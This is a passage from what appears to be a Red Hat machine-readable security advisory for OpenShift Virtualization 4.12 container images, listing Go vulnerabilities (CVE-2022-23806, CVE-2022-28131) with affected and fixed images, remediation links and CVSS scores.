"https://access.redhat.com/security/cve/CVE-2022-23806", }, { category: "external", summary: "RHBZ#2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23806", url: "https://www.cve.org/CVERecord?id=CVE-2022-23806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.1, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", }, { cve: "CVE-2022-28131", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107390", }, ], notes: [ { category: "description", text: "A flaw was found in golang encoding/xml. When calling Decoder, Skip while parsing a deeply nested XML document, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/xml: stack exhaustion in Decoder.Skip", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-28131", }, { category: "external", summary: "RHBZ#2107390", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-28131", url: "https://www.cve.org/CVERecord?id=CVE-2022-28131", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-28131", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-28131", }, { category: "external", summary: "https://go.dev/issue/53614", url: "https://go.dev/issue/53614", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 7.3, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", 